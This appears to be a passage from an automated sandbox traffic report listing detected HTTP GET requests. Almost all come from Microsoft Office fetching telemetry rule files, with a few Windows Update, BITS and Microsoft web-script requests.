              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WB29hw7aL49cTdZ&MD=L8dCy2SS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WB29hw7aL49cTdZ&MD=L8dCy2SS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
